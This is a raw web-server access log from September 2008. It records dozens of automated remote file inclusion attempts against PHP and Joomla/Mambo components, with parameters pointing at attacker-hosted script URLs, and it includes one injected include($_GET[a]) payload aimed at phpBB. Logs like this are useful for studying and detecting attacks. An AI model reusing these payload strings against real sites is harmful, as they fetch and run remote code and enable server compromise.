69.20.57.20 - - [22/Sep/2008:10:39:46 -0700] "GET /logs/index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:39:46 -0700] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.20.57.20 - - [22/Sep/2008:10:39:46 -0700] "GET /index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 200 94776 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:39:47 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94966 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:39:49 -0700] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:10:40:02 -0700] "GET /logs/access_080824.log/errors.php?error=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:40:02 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:10:40:03 -0700] "GET /errors.php?error=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:40:03 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:10:40:03 -0700] "GET /logs/errors.php?error=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:40:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:40:07 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [22/Sep/2008:10:40:10 -0700] "GET /minamijewelry/html/bird.html HTTP/1.1" 200 20961 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:40:17 -0700] "GET /logs/access_080129.log//inc/functions.inc.php?config[ppa_root_path]=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [22/Sep/2008:10:40:17 -0700] "GET /logs/access_080901.log/errors.php?error=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:40:52 -0700] "GET //index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 200 95066 "-" "libwww-perl/5.65" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:41:06 -0700] "GET /logs/access_080222.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.18.71 - - [22/Sep/2008:10:41:41 -0700] "GET /logs/access_071109.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://83.19.144.26/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:10:42:13 -0700] "GET /logs//bottom.php?style=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:10:42:13 -0700] "GET /logs//bottom.php?style=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:10:42:13 -0700] "GET //bottom.php?style=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [22/Sep/2008:10:42:13 -0700] "GET //bottom.php?style=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.195.36 - - [22/Sep/2008:10:42:16 -0700] "GET /logs/access_080709.log%20/errors.php?error=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.111.166.193 - - [22/Sep/2008:10:42:21 -0700] "GET /logs/access_080530.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.36.144.8 - - [22/Sep/2008:10:42:35 -0700] "GET /logs/access_080102.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:42:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:10:42:40 -0700] "GET /logs/access_080830.log%20//index.php?DOCUMENT_ROOT=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:42:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [22/Sep/2008:10:42:48 -0700] "GET /logs/access_080411.log//index.php?option=com_rsgallery&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.110.245 - - [22/Sep/2008:10:42:55 -0700] "GET /minamijewelry/html/bird.html HTTP/1.0" 200 20961 "http://search.live.com/results.aspx?q=customize" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:43:05 -0700] "GET /logs/access_080107.log//includes/header.php?c_temp_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:43:07 -0700] "GET //includes/header.php?c_temp_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:43:09 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:43:27 -0700] "GET /logs/access_080826.log//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:43:34 -0700] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:43:42 -0700] "GET /logs/access_080401.log/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:43:42 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:43:43 -0700] "GET /logs/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:44:15 -0700] "GET /logs/access_080524.log//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:44:33 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:44:33 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:44:33 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:45 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.238.163.25 - - [22/Sep/2008:10:44:46 -0700] "GET /logs/access_080817.log//admin.php?include_path=http://ebukudame.com/sobi/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [22/Sep/2008:10:44:49 -0700] "GET /logs/access_080603.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [22/Sep/2008:10:44:49 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [22/Sep/2008:10:44:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:50 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:50 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:53 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:59 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:44:59 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:00 -0700] "GET /?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 94767 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:01 -0700] "GET /?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 94767 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:01 -0700] "GET /logs/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 66163 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:01 -0700] "GET /logs/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 200 66163 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.137.51 - - [22/Sep/2008:10:45:10 -0700] "GET /logs/access_080714.log//main.php?page=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [22/Sep/2008:10:45:11 -0700] "GET //main.php?page=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [22/Sep/2008:10:45:11 -0700] "GET /logs//main.php?page=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:16 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:45:17 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:45:19 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:45:21 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.86.96.130 - - [22/Sep/2008:10:45:21 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:45:34 -0700] "GET /logs/access_080415.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:45:49 -0700] "GET /logs/access_080603.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:45:49 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:45:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:46:00 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:10:46:01 -0700] "GET /logs/access_080901.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.70.63.54 - - [22/Sep/2008:10:46:15 -0700] "GET /logs/index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.70.63.54 - - [22/Sep/2008:10:46:16 -0700] "GET /index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 200 94760 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:10:46:19 -0700] "GET /logs/access_080816.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [22/Sep/2008:10:46:22 -0700] "GET /logs/access_080826.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://zer0web.webcindario.com/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:46:24 -0700] "GET /logs//index.php?inc=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:46:24 -0700] "GET /logs/access_080906.log//index.php?inc=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:46:25 -0700] "GET /logs/index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:46:26 -0700] "GET //index.php?inc=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 94847 "-" "libwww-perl/5.814" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:10:46:26 -0700] "GET /index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94966 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
204.8.223.144 - - [22/Sep/2008:10:46:31 -0700] "GET /logs/access_080820.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:46:32 -0700] "GET /logs/access_080217.log//index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:46:34 -0700] "GET //index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 95341 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:46:35 -0700] "GET /logs//index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:46:46 -0700] "GET /logs/access_080325.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:46:47 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:46:48 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:46:54 -0700] "GET /logs/access_080623.log//index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.242.93 - - [22/Sep/2008:10:47:10 -0700] "GET /logs/access_080603.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.242.93 - - [22/Sep/2008:10:47:10 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.242.93 - - [22/Sep/2008:10:47:10 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gengaming.com/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [22/Sep/2008:10:47:12 -0700] "GET /logs/index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.181.105.117 - - [22/Sep/2008:10:47:13 -0700] "GET /index.php?page=http://www.infofilme.ro/comments/test.txt??? HTTP/1.1" 200 94760 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:47:21 -0700] "GET /index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 200 95036 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
91.121.137.51 - - [22/Sep/2008:10:47:21 -0700] "GET /logs/access_080713.log//main.php?page=http://albgroup.100megsfree8.com/Id/rd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:47:31 -0700] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:10:47:39 -0700] "GET /logs/index.php?option=com_akocomment&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.44.236.14 - - [22/Sep/2008:10:47:45 -0700] "GET //index2.php?page=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.44.236.14 - - [22/Sep/2008:10:47:46 -0700] "GET /logs//index2.php?page=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:47:54 -0700] "GET /logs/access_080830.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [22/Sep/2008:10:47:55 -0700] "GET /logs/access_080903.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:47:57 -0700] "GET /logs/access_080725.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:47:59 -0700] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 95170 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:10:48:00 -0700] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:48:23 -0700] "GET /logs//include/lib.inc.php?site_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:48:23 -0700] "GET /logs/access_080801.log//include/lib.inc.php?site_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:48:23 -0700] "GET /logs/access_080805.log//errors.php?error=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:48:23 -0700] "GET //errors.php?error=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.243.113 - - [22/Sep/2008:10:48:23 -0700] "GET /logs//errors.php?error=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.21.204.78 - - [22/Sep/2008:10:48:23 -0700] "GET //include/lib.inc.php?site_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
